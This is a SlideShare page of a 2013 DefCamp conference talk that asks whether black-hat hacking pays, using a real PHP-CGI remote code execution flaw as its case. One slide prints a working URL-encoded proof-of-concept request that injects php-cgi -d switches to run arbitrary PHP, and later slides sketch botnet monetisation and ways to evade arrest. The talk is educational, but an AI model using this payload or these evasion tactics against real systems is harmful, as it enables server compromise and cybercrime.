SlideShare a Scribd company logo
1 of 26
DOES IT PAY TO BE A
BLACKHAT HACKER?
DefCamp Romania – November 29, 2013
Speaker: Dan Catalin VASILE
About me
• Information Security Consultant
• OWASP Romania Board Member
• InfoSec Researcher / Writer / Presenter

dan@pentest.ro
http://www.pentest.ro
Agenda
•
•
•
•

What is a hacker?
Different types of hats
A real world vulnerability
Exploitation
– White
– Grey
– Black

• Gains and risks
• Conclusion
What is a hacker?
Original definition (MIT 1960s & RFC 1392)
A person who delights in having an intimate
understanding of the internal workings of a system,
computers and computer networks in particular.
Main-stream media definition & general public
acceptance (also in RFC 1392)
Mass media and general public's usage of the word
hacker refers to security breakers motivated mainly by
financial gains.
Hackers may be motivated by a multitude of reasons,
such as profit, protest, or challenge.
Different kinds of hats
White hat
An ethical computer hacker, or a computer security expert, who
specializes in penetration testing and in other testing
methodologies to ensure the security of an organization's
information systems.
Grey hat
A skilled hacker whose activities fall somewhere between white
and black hat hackers in a variety of practices. Sometimes he acts
illegally, though in good will, to identify vulnerabilities in
computing processes.
Black hat
A hacker who violates computer security for little reason beyond
maliciousness or for personal gain.
A real world vulnerability
Apache Web Server :: remote code execution
Where?
In the default installation of php5-cgi package.
The problem
PHP-CGI-based setups contain a vulnerability when parsing query
string parameters from php files.
Description
When the php-cgi receives a processed query string parameter as
command line arguments which allows command-line switches,
such as -s, -d or -c to be passed to the php-cgi binary, which can
be exploited to disclose source code and obtain arbitrary code
execution.
A real world vulnerability
Apache Web Server :: remote code execution
The vulnerability
In the source code file sapi/cgi/cgi_main.c of PHP we can see that
the security check is done when the php.ini configuration setting
cgi.force_redirect is set and the php.ini configuration setting
cgi.redirect_status_env is set to NULL.
STD_PHP_INI_ENTRY("cgi.force_redirect","1", PHP_INI_SYSTEM, OnUpdateBool,force_redirect,
php_cgi_globals_struct, php_cgi_globals)
STD_PHP_INI_ENTRY("cgi.redirect_status_env", NULL, PHP_INI_SYSTEM, OnUpdateString,
redirect_status_env, php_cgi_globals_struct, php_cgi_globals)

It is possible to set cgi.force_redirect to zero and
cgi.redirect_status_env to zero using the -d switch so that php-cgi
gets fully executed and we can use the payload in the POST data
field to execute arbitrary php.
A real world vulnerability
Apache Web Server :: remote code execution

Impact!!!
A remote unauthenticated attacker could obtain sensitive
information, cause a denial of service condition or may be able to
execute arbitrary code with the privileges of the web server.
A real world vulnerability
Apache Web Server :: remote code execution
Exploitation PoC
char poststr[] = "POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F" 
"%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64" 
"+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73" 
"%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E" 
"%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63" 
"%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62" 
"%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74" 
"%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68" 
"%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F" 
"%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63" 
"%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73" 
"%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1rn" 
"Host: %srn" 
"User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26" 
"(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25rn" 
"Content-Type: application/x-www-form-urlencodedrn" 
"Content-Length: %drn" 
"Connection: closernrn%s";

-d
allow_url_include=on
-d
safe_mode=off
-d
suhosin.simulation=on
-d
disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d
cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
A real world vulnerability
Apache Web Server :: remote code execution
Show me the numbers
A tale of three
Alice

Bob

Mallory
What are the options?
Responsible disclosure
- Let Apache know about the problem
- Let them fix it
- Allow “some” time for the patch to be installed on most (??)
of the systems
- Make the public announcement and get the credit
- For some cash you can make Google pay for it

A list of bug bounties programs:
https://bugcrowd.com/list-of-bug-bounty-programs/
What are the options?
Sell the vulnerability to a broker

- TippingPoint's Zero-Day Initiative
- iDefense's Vulnerability Contributor Program
- Vupen’s Threat Protection Program
What are the options?
Exploit it on your own!
- Small scale
-

A few selected targets

- Very large scale
-

Internet size attack
Create a botnet of servers
White Hat Alice
Employer: big consulting corporation
Annual net income: ~$80.000
Approach:
- Responsible disclosure
Gains:
- Fame
- ~$3k / reporting the vulnerability
https://www.google.com/about/appsecurity/patch-rewards/
Risks:
- Mainly risk free
Grey Hat Bob
Employer: small web-hosting provider
Annual net income: ~$45.000
Approach:
-

Exploit it on a small scale
Sell it to a broker
Disclose it anonymously

Gains:
-

No fame, just some fortune
$50k from the broker
~$15k / year

Risks:
-

Legal charges for hacking
Black Hat Mallory
Employer: self-employed/freelancer
Annual net income: ~$20.000
Approach:
-

Exploit it on a ‘never-seen’ scale

Phase 1
Black Hat Mallory
Phase 2

Scale? Millions of machines (10+)
Black Hat Mallory
Uses for the botnet
•
•
•
•
•
•
•
•

Distributed Denial-of-Service Attacks
Spamming
Sniffing Traffic
Spreading new malware
Advertisement services abuse
Manipulating pools/games/etc
Mass identity theft
Many others
Black Hat Mallory
DDOS

Market price:
$200/10k bots/day
Mallory’s price?
~200k/day/client
Multiple clients

He can literally make millions every day.
Black Hat Mallory
DDOS
Spamhaus DDOS attack

When?
March 2013

How big?
300Gbps
Black Hat Mallory
Risks?
Besides being the most wanted cyber-criminal ever? 

Going to jail!

Side thoughts
- He only uses Bitcoins or alternative untraceable payment
options

- He uses money mules to cash out
- The botnet gets divided
- He moves to a country with no extradition treaty
Aftermath
It takes months (years?) for the Internet to recover after such a
breach.
Patching, releasing, clean install, removing all the infections is a
painfully long process since the botnet tries to reactivate.

What was real and what was not?

- Apache PHP Vulnerability – REAL
- PoC – REAL
- the impact – not so real
-Black-hat exploitation – science-fiction, yet doable
A tale of three
Alice

Bob

Mallory
Conclusions
Are there any?

Does it pay to be blackhat?
It does. Financially. Only!
Do we hunt all blackhats down?
Different shades of gray.
Thank you

dan@pentest.ro
http://www.pentest.ro

More Related Content

What's hot

Different types of attacks in internet
Different types of attacks in internetDifferent types of attacks in internet
Different types of attacks in internetRohan Bharadwaj
 
Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Umesh Mahawar
 
Tutorial 9 - Security on the Internet
Tutorial 9 - Security on the InternetTutorial 9 - Security on the Internet
Tutorial 9 - Security on the Internetdpd
 
Hacktrikz - Introduction to Information Security & Ethical Hacking
Hacktrikz - Introduction to Information Security & Ethical HackingHacktrikz - Introduction to Information Security & Ethical Hacking
Hacktrikz - Introduction to Information Security & Ethical HackingRavi Sankar
 
Cse ethical hacking ppt
Cse ethical hacking pptCse ethical hacking ppt
Cse ethical hacking pptshreya_omar
 
Cse ethical hacking ppt
Cse ethical hacking pptCse ethical hacking ppt
Cse ethical hacking pptSHAHID ANSARI
 
Penetration testing
Penetration testing Penetration testing
Penetration testing PTC
 
Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...
Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...
Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...wajug
 
Cyber Attack Analysis : Part I DDoS
Cyber Attack Analysis : Part I DDoSCyber Attack Analysis : Part I DDoS
Cyber Attack Analysis : Part I DDoSKenny Huang Ph.D.
 
Network Security Threats and Solutions
Network Security Threats and SolutionsNetwork Security Threats and Solutions
Network Security Threats and SolutionsColin058
 
Ethical hacking : Its methodologies and tools
Ethical hacking : Its methodologies and toolsEthical hacking : Its methodologies and tools
Ethical hacking : Its methodologies and toolschrizjohn896
 
Types of Malware (CEH v11)
Types of Malware (CEH v11)Types of Malware (CEH v11)
Types of Malware (CEH v11)EC-Council
 

What's hot (19)

Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Hacking
HackingHacking
Hacking
 
Different types of attacks in internet
Different types of attacks in internetDifferent types of attacks in internet
Different types of attacks in internet
 
Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)
 
Tutorial 9 - Security on the Internet
Tutorial 9 - Security on the InternetTutorial 9 - Security on the Internet
Tutorial 9 - Security on the Internet
 
Hacktrikz - Introduction to Information Security & Ethical Hacking
Hacktrikz - Introduction to Information Security & Ethical HackingHacktrikz - Introduction to Information Security & Ethical Hacking
Hacktrikz - Introduction to Information Security & Ethical Hacking
 
Cse ethical hacking ppt
Cse ethical hacking pptCse ethical hacking ppt
Cse ethical hacking ppt
 
Cse ethical hacking ppt
Cse ethical hacking pptCse ethical hacking ppt
Cse ethical hacking ppt
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Penetration testing
Penetration testing Penetration testing
Penetration testing
 
Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...
Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...
Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...
 
Internet Security
Internet SecurityInternet Security
Internet Security
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Security threats
Security threatsSecurity threats
Security threats
 
Cyber Attack Analysis : Part I DDoS
Cyber Attack Analysis : Part I DDoSCyber Attack Analysis : Part I DDoS
Cyber Attack Analysis : Part I DDoS
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Network Security Threats and Solutions
Network Security Threats and SolutionsNetwork Security Threats and Solutions
Network Security Threats and Solutions
 
Ethical hacking : Its methodologies and tools
Ethical hacking : Its methodologies and toolsEthical hacking : Its methodologies and tools
Ethical hacking : Its methodologies and tools
 
Types of Malware (CEH v11)
Types of Malware (CEH v11)Types of Malware (CEH v11)
Types of Malware (CEH v11)
 

Viewers also liked

how to prevent system from hacking...by sarika
how to prevent system from hacking...by sarikahow to prevent system from hacking...by sarika
how to prevent system from hacking...by sarikaSarika Dyne
 
Hacking Law Reform LAWS4305 2003
Hacking Law Reform LAWS4305 2003Hacking Law Reform LAWS4305 2003
Hacking Law Reform LAWS4305 2003Peter Timusk
 
Web defacement
Web defacementWeb defacement
Web defacementstudent
 
Introduction to Growth Hacking
Introduction to Growth HackingIntroduction to Growth Hacking
Introduction to Growth HackingRadek Grabarek
 
Cyber Crime and Ethical Hacking
Cyber Crime and Ethical HackingCyber Crime and Ethical Hacking
Cyber Crime and Ethical HackingANKIT KUMAR
 
Cross Site Scripting - Web Defacement Techniques
Cross Site Scripting - Web Defacement TechniquesCross Site Scripting - Web Defacement Techniques
Cross Site Scripting - Web Defacement TechniquesRonan Dunne, CEH, SSCP
 
Password Stealing & Enhancing User Authentication Using Opass Protocol
Password Stealing & Enhancing User Authentication Using Opass ProtocolPassword Stealing & Enhancing User Authentication Using Opass Protocol
Password Stealing & Enhancing User Authentication Using Opass ProtocolPrasad Pawar
 
Hacking and Hackers
Hacking and HackersHacking and Hackers
Hacking and HackersFarwa Ansari
 
Cyber Law With case studies
Cyber Law With case studies Cyber Law With case studies
Cyber Law With case studies Bhagya Bgk
 
ICT Form 4: Hacking
ICT Form 4: HackingICT Form 4: Hacking
ICT Form 4: HackingQhaiyum Shah
 
Hacking & its types
Hacking & its typesHacking & its types
Hacking & its typesSai Sakoji
 

Viewers also liked (16)

how to prevent system from hacking...by sarika
how to prevent system from hacking...by sarikahow to prevent system from hacking...by sarika
how to prevent system from hacking...by sarika
 
Hacking
HackingHacking
Hacking
 
Hacking Law Reform LAWS4305 2003
Hacking Law Reform LAWS4305 2003Hacking Law Reform LAWS4305 2003
Hacking Law Reform LAWS4305 2003
 
Haking PPT
Haking PPTHaking PPT
Haking PPT
 
Hacking Psychology
Hacking PsychologyHacking Psychology
Hacking Psychology
 
Web defacement
Web defacementWeb defacement
Web defacement
 
Introduction to Growth Hacking
Introduction to Growth HackingIntroduction to Growth Hacking
Introduction to Growth Hacking
 
Hacking
HackingHacking
Hacking
 
Cyber Crime and Ethical Hacking
Cyber Crime and Ethical HackingCyber Crime and Ethical Hacking
Cyber Crime and Ethical Hacking
 
Cross Site Scripting - Web Defacement Techniques
Cross Site Scripting - Web Defacement TechniquesCross Site Scripting - Web Defacement Techniques
Cross Site Scripting - Web Defacement Techniques
 
Password Stealing & Enhancing User Authentication Using Opass Protocol
Password Stealing & Enhancing User Authentication Using Opass ProtocolPassword Stealing & Enhancing User Authentication Using Opass Protocol
Password Stealing & Enhancing User Authentication Using Opass Protocol
 
Hacking and Hackers
Hacking and HackersHacking and Hackers
Hacking and Hackers
 
Windows Hacking
Windows HackingWindows Hacking
Windows Hacking
 
Cyber Law With case studies
Cyber Law With case studies Cyber Law With case studies
Cyber Law With case studies
 
ICT Form 4: Hacking
ICT Form 4: HackingICT Form 4: Hacking
ICT Form 4: Hacking
 
Hacking & its types
Hacking & its typesHacking & its types
Hacking & its types
 

Similar to Defcamp 2013 - Does it pay to be a blackhat hacker

Hacking and Cyber Security.
Hacking and Cyber Security.Hacking and Cyber Security.
Hacking and Cyber Security.Kalpesh Doru
 
Fundamental of ethical hacking
Fundamental of ethical hackingFundamental of ethical hacking
Fundamental of ethical hackingWaseem Rauf
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hackingAnumadil1
 
Honeypots, Deception, and Frankenstein
Honeypots, Deception, and FrankensteinHoneypots, Deception, and Frankenstein
Honeypots, Deception, and FrankensteinPhillip Maddux
 
Drupal Camp Bristol 2017 - Website insecurity
Drupal Camp Bristol 2017 - Website insecurityDrupal Camp Bristol 2017 - Website insecurity
Drupal Camp Bristol 2017 - Website insecurityGeorge Boobyer
 
Honeypots, Deception, and Frankenstein
Honeypots, Deception, and FrankensteinHoneypots, Deception, and Frankenstein
Honeypots, Deception, and FrankensteinPhillip Maddux
 
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...Mazin Ahmed
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedfangjiafu
 
Blue team reboot - HackFest
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest Haydn Johnson
 
HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisHackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisAntonio Parata
 
Computer_Hacking_for_Beginners_Kevin_James_complex.pdf
Computer_Hacking_for_Beginners_Kevin_James_complex.pdfComputer_Hacking_for_Beginners_Kevin_James_complex.pdf
Computer_Hacking_for_Beginners_Kevin_James_complex.pdfxererenhosdominaram
 
Cyber_Security_Seminar_PPTs_to Upload.pptx
Cyber_Security_Seminar_PPTs_to Upload.pptxCyber_Security_Seminar_PPTs_to Upload.pptx
Cyber_Security_Seminar_PPTs_to Upload.pptxDrMajidMumtaz
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network SecurityHarish Chaudhary
 
Cyber attacks 101
Cyber attacks 101Cyber attacks 101
Cyber attacks 101Rafel Ivgi
 
Crack the Code
Crack the CodeCrack the Code
Crack the CodeInnoTech
 

Similar to Defcamp 2013 - Does it pay to be a blackhat hacker (20)

Hacking and Cyber Security.
Hacking and Cyber Security.Hacking and Cyber Security.
Hacking and Cyber Security.
 
Fundamental of ethical hacking
Fundamental of ethical hackingFundamental of ethical hacking
Fundamental of ethical hacking
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Honeypots, Deception, and Frankenstein
Honeypots, Deception, and FrankensteinHoneypots, Deception, and Frankenstein
Honeypots, Deception, and Frankenstein
 
Drupal Camp Bristol 2017 - Website insecurity
Drupal Camp Bristol 2017 - Website insecurityDrupal Camp Bristol 2017 - Website insecurity
Drupal Camp Bristol 2017 - Website insecurity
 
Honeypots, Deception, and Frankenstein
Honeypots, Deception, and FrankensteinHoneypots, Deception, and Frankenstein
Honeypots, Deception, and Frankenstein
 
Ethical hacking.
Ethical hacking.Ethical hacking.
Ethical hacking.
 
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
 
Hacking and its Defence
Hacking and its DefenceHacking and its Defence
Hacking and its Defence
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
 
Blue team reboot - HackFest
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest
 
HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisHackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware Analysis
 
Computer_Hacking_for_Beginners_Kevin_James_complex.pdf
Computer_Hacking_for_Beginners_Kevin_James_complex.pdfComputer_Hacking_for_Beginners_Kevin_James_complex.pdf
Computer_Hacking_for_Beginners_Kevin_James_complex.pdf
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Cyber_Security_Seminar_PPTs_to Upload.pptx
Cyber_Security_Seminar_PPTs_to Upload.pptxCyber_Security_Seminar_PPTs_to Upload.pptx
Cyber_Security_Seminar_PPTs_to Upload.pptx
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security
 
Cyber attacks 101
Cyber attacks 101Cyber attacks 101
Cyber attacks 101
 
Crack the Code
Crack the CodeCrack the Code
Crack the Code
 
Path of Cyber Security
Path of Cyber SecurityPath of Cyber Security
Path of Cyber Security
 

More from DefCamp

Remote Yacht Hacking
Remote Yacht HackingRemote Yacht Hacking
Remote Yacht HackingDefCamp
 
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!DefCamp
 
The Charter of Trust
The Charter of TrustThe Charter of Trust
The Charter of TrustDefCamp
 
Internet Balkanization: Why Are We Raising Borders Online?
Internet Balkanization: Why Are We Raising Borders Online?Internet Balkanization: Why Are We Raising Borders Online?
Internet Balkanization: Why Are We Raising Borders Online?DefCamp
 
Bridging the gap between CyberSecurity R&D and UX
Bridging the gap between CyberSecurity R&D and UXBridging the gap between CyberSecurity R&D and UX
Bridging the gap between CyberSecurity R&D and UXDefCamp
 
Secure and privacy-preserving data transmission and processing using homomorp...
Secure and privacy-preserving data transmission and processing using homomorp...Secure and privacy-preserving data transmission and processing using homomorp...
Secure and privacy-preserving data transmission and processing using homomorp...DefCamp
 
Drupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the AttackerDrupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the AttackerDefCamp
 
Economical Denial of Sustainability in the Cloud (EDOS)
Economical Denial of Sustainability in the Cloud (EDOS)Economical Denial of Sustainability in the Cloud (EDOS)
Economical Denial of Sustainability in the Cloud (EDOS)DefCamp
 
Trust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFATrust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFADefCamp
 
Threat Hunting: From Platitudes to Practical Application
Threat Hunting: From Platitudes to Practical ApplicationThreat Hunting: From Platitudes to Practical Application
Threat Hunting: From Platitudes to Practical ApplicationDefCamp
 
Building application security with 0 money down
Building application security with 0 money downBuilding application security with 0 money down
Building application security with 0 money downDefCamp
 
Implementation of information security techniques on modern android based Kio...
Implementation of information security techniques on modern android based Kio...Implementation of information security techniques on modern android based Kio...
Implementation of information security techniques on modern android based Kio...DefCamp
 
Lattice based Merkle for post-quantum epoch
Lattice based Merkle for post-quantum epochLattice based Merkle for post-quantum epoch
Lattice based Merkle for post-quantum epochDefCamp
 
The challenge of building a secure and safe digital environment in healthcare
The challenge of building a secure and safe digital environment in healthcareThe challenge of building a secure and safe digital environment in healthcare
The challenge of building a secure and safe digital environment in healthcareDefCamp
 
Timing attacks against web applications: Are they still practical?
Timing attacks against web applications: Are they still practical?Timing attacks against web applications: Are they still practical?
Timing attacks against web applications: Are they still practical?DefCamp
 
Tor .onions: The Good, The Rotten and The Misconfigured
Tor .onions: The Good, The Rotten and The Misconfigured Tor .onions: The Good, The Rotten and The Misconfigured
Tor .onions: The Good, The Rotten and The Misconfigured DefCamp
 
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...DefCamp
 
We will charge you. How to [b]reach vendor’s network using EV charging station.
We will charge you. How to [b]reach vendor’s network using EV charging station.We will charge you. How to [b]reach vendor’s network using EV charging station.
We will charge you. How to [b]reach vendor’s network using EV charging station.DefCamp
 
Connect & Inspire Cyber Security
Connect & Inspire Cyber SecurityConnect & Inspire Cyber Security
Connect & Inspire Cyber SecurityDefCamp
 
The lions and the watering hole
The lions and the watering holeThe lions and the watering hole
The lions and the watering holeDefCamp
 

More from DefCamp (20)

Remote Yacht Hacking
Remote Yacht HackingRemote Yacht Hacking
Remote Yacht Hacking
 
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
 
The Charter of Trust
The Charter of TrustThe Charter of Trust
The Charter of Trust
 
Internet Balkanization: Why Are We Raising Borders Online?
Internet Balkanization: Why Are We Raising Borders Online?Internet Balkanization: Why Are We Raising Borders Online?
Internet Balkanization: Why Are We Raising Borders Online?
 
Bridging the gap between CyberSecurity R&D and UX
Bridging the gap between CyberSecurity R&D and UXBridging the gap between CyberSecurity R&D and UX
Bridging the gap between CyberSecurity R&D and UX
 
Secure and privacy-preserving data transmission and processing using homomorp...
Secure and privacy-preserving data transmission and processing using homomorp...Secure and privacy-preserving data transmission and processing using homomorp...
Secure and privacy-preserving data transmission and processing using homomorp...
 
Drupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the AttackerDrupalgeddon 2 – Yet Another Weapon for the Attacker
Drupalgeddon 2 – Yet Another Weapon for the Attacker
 
Economical Denial of Sustainability in the Cloud (EDOS)
Economical Denial of Sustainability in the Cloud (EDOS)Economical Denial of Sustainability in the Cloud (EDOS)
Economical Denial of Sustainability in the Cloud (EDOS)
 
Trust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFATrust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFA
 
Threat Hunting: From Platitudes to Practical Application
Threat Hunting: From Platitudes to Practical ApplicationThreat Hunting: From Platitudes to Practical Application
Threat Hunting: From Platitudes to Practical Application
 
Building application security with 0 money down
Building application security with 0 money downBuilding application security with 0 money down
Building application security with 0 money down
 
Implementation of information security techniques on modern android based Kio...
Implementation of information security techniques on modern android based Kio...Implementation of information security techniques on modern android based Kio...
Implementation of information security techniques on modern android based Kio...
 
Lattice based Merkle for post-quantum epoch
Lattice based Merkle for post-quantum epochLattice based Merkle for post-quantum epoch
Lattice based Merkle for post-quantum epoch
 
The challenge of building a secure and safe digital environment in healthcare
The challenge of building a secure and safe digital environment in healthcareThe challenge of building a secure and safe digital environment in healthcare
The challenge of building a secure and safe digital environment in healthcare
 
Timing attacks against web applications: Are they still practical?
Timing attacks against web applications: Are they still practical?Timing attacks against web applications: Are they still practical?
Timing attacks against web applications: Are they still practical?
 
Tor .onions: The Good, The Rotten and The Misconfigured
Tor .onions: The Good, The Rotten and The Misconfigured Tor .onions: The Good, The Rotten and The Misconfigured
Tor .onions: The Good, The Rotten and The Misconfigured
 
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
 
We will charge you. How to [b]reach vendor’s network using EV charging station.
We will charge you. How to [b]reach vendor’s network using EV charging station.We will charge you. How to [b]reach vendor’s network using EV charging station.
We will charge you. How to [b]reach vendor’s network using EV charging station.
 
Connect & Inspire Cyber Security
Connect & Inspire Cyber SecurityConnect & Inspire Cyber Security
Connect & Inspire Cyber Security
 
The lions and the watering hole
The lions and the watering holeThe lions and the watering hole
The lions and the watering hole
 

Recently uploaded

Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsContinuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsLeah Henrickson
 
Using IESVE for Room Loads Analysis - UK & Ireland
Using IESVE for Room Loads Analysis - UK & IrelandUsing IESVE for Room Loads Analysis - UK & Ireland
Using IESVE for Room Loads Analysis - UK & IrelandIES VE
 
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...
Behind the Scenes From the Manager's Chair: Decoding the Secrets of Successfu...CzechDreamin
 
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdf
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdfLinux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdf
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdfFIDO Alliance
 
Powerful Start- the Key to Project Success, Barbara Laskowska
Powerful Start- the Key to Project Success, Barbara LaskowskaPowerful Start- the Key to Project Success, Barbara Laskowska
Powerful Start- the Key to Project Success, Barbara LaskowskaCzechDreamin
 
Oauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoftOauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoftshyamraj55
 
Simplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdf
Simplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdfSimplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdf
Simplified FDO Manufacturing Flow with TPMs _ Liam at Infineon.pdfFIDO Alliance
 
Microsoft CSP Briefing Pre-Engagement - Questionnaire
Microsoft CSP Briefing Pre-Engagement - QuestionnaireMicrosoft CSP Briefing Pre-Engagement - Questionnaire
Microsoft CSP Briefing Pre-Engagement - QuestionnaireExakis Nelite
 
WSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptxWSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptxJennifer Lim
 
Syngulon - Selection technology May 2024.pdf
Syngulon - Selection technology May 2024.pdfSyngulon - Selection technology May 2024.pdf
Syngulon - Selection technology May 2024.pdfSyngulon
 
Designing for Hardware Accessibility at Comcast
Designing for Hardware Accessibility at ComcastDesigning for Hardware Accessibility at Comcast
Designing for Hardware Accessibility at ComcastUXDXConf
 
A Business-Centric Approach to Design System Strategy
A Business-Centric Approach to Design System StrategyA Business-Centric Approach to Design System Strategy
A Business-Centric Approach to Design System StrategyUXDXConf
 
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...FIDO Alliance
 
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...Easier, Faster, and More Powerful – Alles Neu macht der Mai -Wir durchleuchte...
